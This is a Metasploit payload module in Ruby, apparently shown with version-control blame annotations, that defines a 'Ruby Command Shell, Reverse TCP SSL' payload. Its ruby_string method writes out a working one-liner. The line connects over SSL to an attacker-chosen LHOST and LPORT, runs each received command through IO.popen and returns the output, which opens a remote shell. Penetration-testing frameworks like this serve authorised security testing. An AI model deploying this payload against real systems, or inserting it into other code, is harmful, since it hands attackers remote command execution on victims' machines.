2013-02-03 19:59:15 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-02-03 19:59:15 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/payload/ruby'
|
|
|
|
require 'msf/core/handler/reverse_tcp_ssl'
|
|
|
|
require 'msf/base/sessions/command_shell'
|
|
|
|
require 'msf/base/sessions/command_shell_options'
|
|
|
|
|
|
|
|
module Metasploit3
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Payload::Single
|
|
|
|
include Msf::Payload::Ruby
|
|
|
|
include Msf::Sessions::CommandShellOptions
|
2013-02-03 19:59:15 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
|
|
|
'Name' => 'Ruby Command Shell, Reverse TCP SSL',
|
|
|
|
'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
|
|
|
|
'Author' => 'RageLtMan',
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Platform' => 'ruby',
|
|
|
|
'Arch' => ARCH_RUBY,
|
|
|
|
'Handler' => Msf::Handler::ReverseTcpSsl,
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
|
|
'PayloadType' => 'ruby',
|
|
|
|
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
|
|
|
|
))
|
|
|
|
end
|
2013-02-03 19:59:15 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def generate
|
|
|
|
rbs = prepends(ruby_string)
|
|
|
|
vprint_good rbs
|
|
|
|
return rbs
|
|
|
|
end
|
2013-02-03 19:59:15 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def ruby_string
|
|
|
|
lhost = datastore['LHOST']
|
|
|
|
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
|
|
|
|
rbs = "require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\","
|
|
|
|
rbs << "\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end"
|
|
|
|
return rbs
|
|
|
|
end
|
2013-03-20 20:47:32 +00:00
|
|
|
|
2013-02-03 19:59:15 +00:00
|
|
|
end
|